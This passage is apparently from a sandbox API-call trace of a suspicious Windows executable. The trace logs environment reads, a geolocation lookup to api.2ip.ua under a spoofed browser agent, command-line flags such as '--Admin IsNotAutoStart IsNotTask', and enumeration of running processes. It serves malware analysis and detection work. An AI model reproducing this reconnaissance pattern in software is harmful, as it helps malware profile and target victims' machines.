lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0089.769] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xf) returned 0x25ecf0 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x25ecf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0089.769] GetLastError () returned 0x0 [0089.769] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x70 [0089.769] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x74) returned 0x261598 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0089.769] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x16) returned 0x261500 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x261500, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0089.769] GetLastError () returned 0x0 [0089.769] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x74 [0089.769] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x78) returned 0x261598 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b6a0 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x25b6a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0089.770] GetLastError () returned 0x0 [0089.770] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x78 [0089.770] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x7c) returned 0x261598 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x29) returned 0x25b6d8 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x25b6d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0089.770] GetLastError () returned 0x0 [0089.770] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x7c [0089.770] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x80) returned 0x261598 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x15) returned 0x261520 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x261520, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0089.770] GetLastError () returned 0x0 [0089.770] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x80 [0089.770] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x84) returned 0x261598 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f7b0 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25f7b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0089.770] GetLastError () returned 0x0 [0089.770] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x84 [0089.770] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x88) returned 0x261598 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b710 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25b710, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0089.770] GetLastError () returned 0x0 [0089.770] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x88 [0089.770] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x8c) returned 0x261598 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0089.770] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x261540 [0089.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x261540, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0089.770] GetLastError () returned 0x0 [0089.771] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x8c [0089.771] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x90) returned 0x261598 [0089.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0089.771] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x261630 [0089.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x261630, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0089.771] GetLastError () returned 0x0 [0089.771] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261598) returned 0x90 [0089.771] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261598, Size=0x94) returned 0x261650 [0089.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0089.771] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x46) returned 0x2571a0 [0089.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2571a0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0089.771] GetLastError () returned 0x0 [0089.771] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261650) returned 0x94 [0089.771] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261650, Size=0x98) returned 0x261650 [0089.771] GetLastError () returned 0x0 [0089.809] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.809] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.809] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.815] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8ec) returned 0x261fe8 [0089.861] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.861] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x10) returned 0x25ed08 [0089.861] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.861] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.862] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.899] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.905] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0090.035] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x2560c8 [0090.035] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0091.154] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ba58, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e258 | out: lpBuffer=0x18ba58*, lpdwNumberOfBytesRead=0x18e258*=0x1d0) returned 1 [0091.156] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0091.157] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0091.157] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20) returned 0x26de60 [0091.165] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1e0) returned 0x31d7d68 [0091.171] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31d7d68 | out: hHeap=0x240000) returned 1 [0091.177] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26de60 | out: hHeap=0x240000) returned 1 [0091.177] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2560c8 | out: hHeap=0x240000) returned 1 [0091.177] GetCurrentProcess () returned 0xffffffff [0091.177] GetLastError () returned 0x2 [0091.178] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x10) returned 0x292010 [0091.189] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8ec) returned 0x2929b8 [0091.195] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x800) returned 0x31b76c8 [0091.195] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31b76c8, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0091.195] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x810) returned 0x31b7ed0 [0091.200] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask" [0091.200] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18e338 | out: pNumArgs=0x18e338) returned 0x31a820*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0091.201] lstrcpyW (in: lpString1=0x18efc8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0091.201] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0091.201] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0091.207] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask" [0091.207] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18e2d4 | out: pNumArgs=0x18e2d4) returned 0x31a820*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0091.207] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0091.207] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0091.207] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0091.207] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0091.208] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0091.208] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0091.238] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0091.238] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0091.238] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0091.238] EnumProcesses (in: lpidProcess=0x183ad0, cb=0xa000, lpcbNeeded=0x18e2e0 | out: lpidProcess=0x183ad0, lpcbNeeded=0x18e2e0) returned 1 [0091.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0091.243] CloseHandle (hObject=0x0) returned 0 [0091.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0091.243] CloseHandle (hObject=0x0) returned 0 [0091.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0091.243] CloseHandle (hObject=0x0) returned 0 [0091.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0091.244] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0091.245] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0091.245] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0091.245] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a8 [0091.245] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0091.245] CloseHandle (hObject=0x5a8) returned 1 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a8 [0091.245] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0091.245] CloseHandle (hObject=0x5a8) returned 1 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0091.245] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0091.245] CloseHandle (hObject=0x0) returned 0 [0091.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a8 [0091.245] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0091.246] CloseHandle (hObject=0x5a8) returned 1 [0091.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5a8 [0091.246] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0091.246] CloseHandle (hObject=0x5a8) returned 1 [0091.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x5a8 [0091.246] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.247] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="jeep cant dl.exe") returned 0x10 [0091.247] CloseHandle (hObject=0x5a8) returned 1 [0091.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x5a8 [0091.247] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.248] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1030000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="particularly.exe") returned 0x10 [0091.249] CloseHandle (hObject=0x5a8) returned 1 [0091.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x5a8 [0091.249] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.250] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forge_prospective.exe") returned 0x15 [0091.250] CloseHandle (hObject=0x5a8) returned 1 [0091.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x5a8 [0091.250] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.251] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="engagemanager.exe") returned 0x11 [0091.251] CloseHandle (hObject=0x5a8) returned 1 [0091.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5a8 [0091.252] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.253] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1280000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="falsepercent.exe") returned 0x10 [0091.253] CloseHandle (hObject=0x5a8) returned 1 [0091.253] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5a8 [0091.253] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.254] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="cool.exe") returned 0x8 [0091.254] CloseHandle (hObject=0x5a8) returned 1 [0091.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5a8 [0091.255] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.256] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="carefully.exe") returned 0xd [0091.256] CloseHandle (hObject=0x5a8) returned 1 [0091.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x208) returned 0x5a8 [0091.256] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.257] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x8a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forced_cooking.exe") returned 0x12 [0091.257] CloseHandle (hObject=0x5a8) returned 1 [0091.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x5a8 [0091.258] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.259] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="takes-mix.exe") returned 0xd [0091.259] CloseHandle (hObject=0x5a8) returned 1 [0091.259] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x5a8 [0091.259] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.260] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="somewhere.exe") returned 0xd [0091.261] 